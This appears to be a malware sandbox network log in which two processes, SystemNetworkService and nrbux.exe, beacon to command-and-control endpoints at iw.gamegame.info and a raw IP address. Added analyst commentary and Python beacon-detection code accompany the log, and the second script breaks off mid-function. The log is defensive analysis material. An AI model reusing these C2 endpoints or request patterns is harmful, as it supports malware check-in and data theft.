Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b83156000031cd32b0b000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=CilUa4%2FcrvvavyFv6Z3vHw3EUX84eZ59%2BU0TxlRXabIrH8JfL1hyl50ZeNBy7l549kpnS6DI5BFPD4TucLfcD7Fz%2BZx%2FsTmr390uHKlMU3xP%2FN5g6MKq1dqj3EcPng%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 668629622c7931cd-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST
http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 398
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:29:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b85b490000fdc1b015d000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=i51q3t4iZgIwuGy4T9BCqCbQaNA2X9HZfpiwNYm7ESfw0O8FmdXXSRzEjd5dewvPHrZGtJ8QZf0pgibDoRYTJt%2Bz8iRIUeyXdC2tdyvKJgm2R7M7RiKOi9vQhldXqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668629a54a1afdc1-PDX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:29:33 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b8838e00001bd5ea85e000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=fSlVp74KRjNpk4X7hXO1b8ilkEV20fyIHPhVNT%2FgwxXixsLVUIEopDLHHzCFPkq%2BMe5X5UqOWnlbrXEX6IMmeBYvoF2uTiPqPfEDXCl8vv33XoznikuljEPkAEAnZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668629e5acfc1bd5-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:29:43 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b8abe60000c77189843000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zqq0PJuXEnLEtFnGvRz8eJfWl6E9WZO95NeHgmG8JX%2FdqFObuCjqRY50GEaLE90XuGzwDxPEgCBkkSukAQtHux7e08YUtFyT4mNhrW6TX0gef%2B%2B3eGzYh%2BwUyRLA2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862a263a01c771-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:29:53 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b8d44d0000735fe62d5000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=0Oe%2BpLhUjrD6hdVYK0DDZzqOIPrE4rPwKmHrkCQd4A6jcohz5X3S39URjqMtNmMPbng7x6pdjGAiOachsXGdVxCRqstA3ulpHG07RY9IX6zmFD8K29Te3TW3s2R0Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862a66ee57735f-CPH
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:29:54 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
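The four POSTs above from SystemNetworkService to iw.gamegame.info/report7.4.php land roughly ten seconds apart, carry an identical Content-Length of 398 and are all answered by a Cloudflare challenge page (403, Server: cloudflare, CF-Chl-Bypass: 1) rather than by the origin; the POST from nrbux.exe goes to a bare IP with no User-Agent header and gets a 200 with a 6-byte body. The Python below is an added example, not part of the Triage report or its tooling: it parses a constructed copy of this listing format and applies two heuristics a detection engineer would run over such a log, fixed-interval/fixed-size beaconing per (process, method, URL) and POSTs whose Host header is an IP literal. The thresholds (minimum of three requests, 25 % jitter), the record field names and the trimmed sample are assumptions made here.

```python
"""Beacon and raw-IP C2 heuristics over a Triage-style HTTP request listing.

Added example, not part of the Triage report. Thresholds and record field
names are assumptions made here.
"""
import re
import statistics
from collections import defaultdict
from email.utils import parsedate_to_datetime
from urllib.parse import urlsplit

_CHROME_UA = ("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
              "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36")


def _entry(url, process, remote, request_headers, status_line, response_headers):
    """Render one entry in the report's own line layout (constructed sample data)."""
    return "\n".join(["• flag-unknown", "POST", url, process, "Remote address:", remote,
                      "Request", f"POST {urlsplit(url).path} HTTP/1.1", *request_headers,
                      "Response", status_line, *response_headers])


# Constructed sample, modelled on the entries above; headers the heuristics
# do not read are dropped. Dates and sizes are the ones shown in the report.
SAMPLE = "\n".join(
    [_entry("http://iw.gamegame.info/report7.4.php", "SystemNetworkService", "104.21.21.221:80",
            [_CHROME_UA, "Host: iw.gamegame.info", "Content-Length: 398"],
            "HTTP/1.1 403 Forbidden",
            [f"Date: Fri, 02 Jul 2021 {t} GMT", "Server: cloudflare", "CF-Chl-Bypass: 1"])
     for t in ("07:29:22", "07:29:33", "07:29:43", "07:29:53")]
    + [_entry("http://185.215.113.55/t5BnOoke2/index.php", "nrbux.exe", "185.215.113.55:80",
              ["Host: 185.215.113.55", "Content-Length: 84"],
              "HTTP/1.1 200 OK",
              ["Date: Fri, 02 Jul 2021 07:29:54 GMT", "Server: Apache/2.4.41 (Ubuntu)",
               "Content-Length: 6"])])

_IP_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


def _headers(lines):
    """'Name: value' lines -> dict keyed by lower-cased header name."""
    out = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            out[name.strip().lower()] = value.strip()
    return out


def parse_entries(text):
    """Split the listing on its bullet marker and extract the fields the heuristics use."""
    entries = []
    for chunk in re.split(r"^\s*• flag-\w+\s*$", text, flags=re.M):
        lines = [l.strip() for l in chunk.splitlines() if l.strip()]
        if len(lines) < 7 or "Request" not in lines or "Response" not in lines:
            continue  # not an HTTP entry, or truncated
        method, url, process = lines[0], lines[1], lines[2]
        req_i, resp_i = lines.index("Request"), lines.index("Response")
        req_hdrs = _headers(lines[req_i + 2:resp_i])  # skip the request line
        resp_hdrs = _headers(lines[resp_i + 2:])      # skip the status line
        date = resp_hdrs.get("date")
        entries.append({
            "method": method, "url": url, "process": process,
            "status": int(lines[resp_i + 1].split()[1]),
            "request_headers": req_hdrs,
            # Only the server's Date header is available, so response time stands in
            # for request time (one-second granularity, server clock).
            "response_time": parsedate_to_datetime(date) if date else None,
        })
    return entries


def find_beacons(entries, min_count=3, jitter=0.25):
    """Flag (process, method, url) groups repeating at a steady interval.

    jitter is the allowed deviation of each gap from the median gap, as a
    fraction of that median; 0.25 is an assumed tolerance for 1 s Date resolution.
    """
    groups = defaultdict(list)
    for e in entries:
        groups[(e["process"], e["method"], e["url"])].append(e)
    findings = []
    for (process, method, url), reqs in groups.items():
        times = sorted(e["response_time"] for e in reqs if e["response_time"])
        if len(times) < min_count:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median = statistics.median(gaps)
        findings.append({
            "process": process, "method": method, "url": url, "count": len(reqs),
            "median_interval_s": median,
            "periodic": median > 0 and all(abs(g - median) <= jitter * median for g in gaps),
            "fixed_body_size": len({e["request_headers"].get("content-length") for e in reqs}) == 1,
            "statuses": sorted({e["status"] for e in reqs}),
        })
    return findings


def find_raw_ip_posts(entries):
    """POSTs whose Host header is a bare IP literal: no DNS lookup, often no User-Agent."""
    return [{"process": e["process"], "url": e["url"], "status": e["status"],
             "user_agent": e["request_headers"].get("user-agent")}
            for e in entries
            if e["method"] == "POST" and _IP_LITERAL.match(e["request_headers"].get("host", ""))]


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for finding in find_beacons(parsed) + find_raw_ip_posts(parsed):
        print(finding)
```

Two caveats when reading the output. The report exposes only the server's Date header, so the intervals are response times at one-second granularity; on a real host you would feed the sensor's request timestamps instead. And a Cloudflare challenge response means the client's report body never reached the origin, but the beaconing pattern still identifies the infected process and the C2 hostname to block, which is what the 403s are useful for.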
• flag-unknown
  POST
  http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address:
  104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 398
  Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:30:04 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b8fc3f00004bf54e90d000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=KtFbGeoJIgytQ9G5reCwh6NOChc%2F31djXMSdinXRuQ7uGE7lGbSyzlY7%2F6%2F8xdt%2BzOr594jPcVltu9JfNpIHzkKjNzmpl9dL%2FzZB3qFsygoX2DDy85xTzaYUhIdynA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862aa6c9754bf5-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:30:14 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b9248e0000c7719792e000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jQmh40tS9jYqH2YdBmvf5nrVWr3ncVup3NfYPCHc9E8MIFttnebXk3m7tRrvtDSCjN4EFJZ%2F8A6OorwwOpdPaz4MqEUV6KFO9EJhHFfilMWDcd3yLH72GW5Ows6WFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862ae74fb8c771-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:30:25 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b94f1f00007cd615954000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=lpSsp7g4cHmu0SRXYGOWlLN9x1FkgevhiOMN7anrDzx0wXplvuVaKFjjf1sd6TXs5aYOgU%2FxHr3JgCphfxaH6ax%2F%2FlxHkTChvVRgutyhvYIsBkxYu0ZTch9mhAwfAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862b2b6ec47cd6-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:30:35 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b9780c00001e5d8e214000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=XMsGtf0Avug6v02RxqgMHEH6u8s%2B%2BvY5p1VnBKSMTwUzvC0pRzntBCH2qya2AJ8DTBNVHkqq7MOdnzreWzyWNtUm8ytVN%2BmvGE3PAMAoa5AMEXHUQQ%2FgHA51tjou9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862b6ceb351e5d-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
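The POST records above to iw.gamegame.info/report7.4.php show a check-in pattern rather than ordinary browsing: same path each time, a constant 398-byte form body, a fixed Chrome 87 User-Agent, and a new attempt roughly every 10 seconds. Each attempt is answered with a Cloudflare 403 carrying CF-Chl-Bypass: 1, which is the edge's challenge page, so the body never reached the origin; that is a blocked beacon, not evidence that the reporting host is dead or benign. The following is an added example and not part of the Triage report or its tooling: a small Python detector that parses records in this page's layout and flags periodic requests with a fixed body size. The sample log is constructed from the five response timestamps on this page plus one hypothetical control request to example.invalid; the thresholds (min_count, max_jitter) are assumptions.

```python
import re
from collections import defaultdict
from email.utils import parsedate_to_datetime
from statistics import median

# Constructed sample input, modelled on the request/response records on this
# page. Only the headers the detector needs are kept; the Date values are the
# five 403 responses shown in the report.
BEACON_TEMPLATE = """\
POST http://iw.gamegame.info/report7.4.php
Request
POST /report7.4.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 398
Response
HTTP/1.1 403 Forbidden
Date: {date}
Content-Type: text/html; charset=UTF-8
CF-Chl-Bypass: 1
Server: cloudflare
"""

BEACON_DATES = [
    "Fri, 02 Jul 2021 07:30:04 GMT",
    "Fri, 02 Jul 2021 07:30:14 GMT",
    "Fri, 02 Jul 2021 07:30:25 GMT",
    "Fri, 02 Jul 2021 07:30:35 GMT",
    "Fri, 02 Jul 2021 07:30:45 GMT",
]

# Hypothetical control request (not from the report) that must not be flagged.
CONTROL_RECORD = """\
GET http://example.invalid/index.html
Request
GET /index.html HTTP/1.1
Host: example.invalid
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:30:20 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
"""

SAMPLE_LOG = "\n".join(
    [BEACON_TEMPLATE.format(date=d) for d in BEACON_DATES] + [CONTROL_RECORD]
)


def parse_records(text):
    """Split a dump into blank-line-separated records; each becomes a dict with
    method, url, response status and lower-cased request/response header maps."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        lines = [l.strip() for l in chunk.splitlines() if l.strip()]
        method, url = lines[0].split(None, 1)
        rec = {"method": method, "url": url, "status": None, "req": {}, "resp": {}}
        section = None
        for line in lines[1:]:
            if line in ("Request", "Response"):
                section = "req" if line == "Request" else "resp"
            elif line.startswith("HTTP/"):                 # response status line
                rec["status"] = int(line.split()[1])
            elif re.match(r"^[A-Z]+ \S+ HTTP/", line):     # request line, skip
                continue
            elif section and ":" in line:
                name, value = line.split(":", 1)
                rec[section][name.strip().lower()] = value.strip()
        records.append(rec)
    return records


def find_beacons(records, min_count=3, max_jitter=0.25):
    """Group records by (method, url) and report groups that repeat at a
    near-constant interval. Also record whether every reply was a Cloudflare
    challenge (403 plus CF-Chl-Bypass: 1): the client was stopped at the edge,
    which says nothing about the origin behind it."""
    groups = defaultdict(list)
    for r in records:
        if "date" in r["resp"]:
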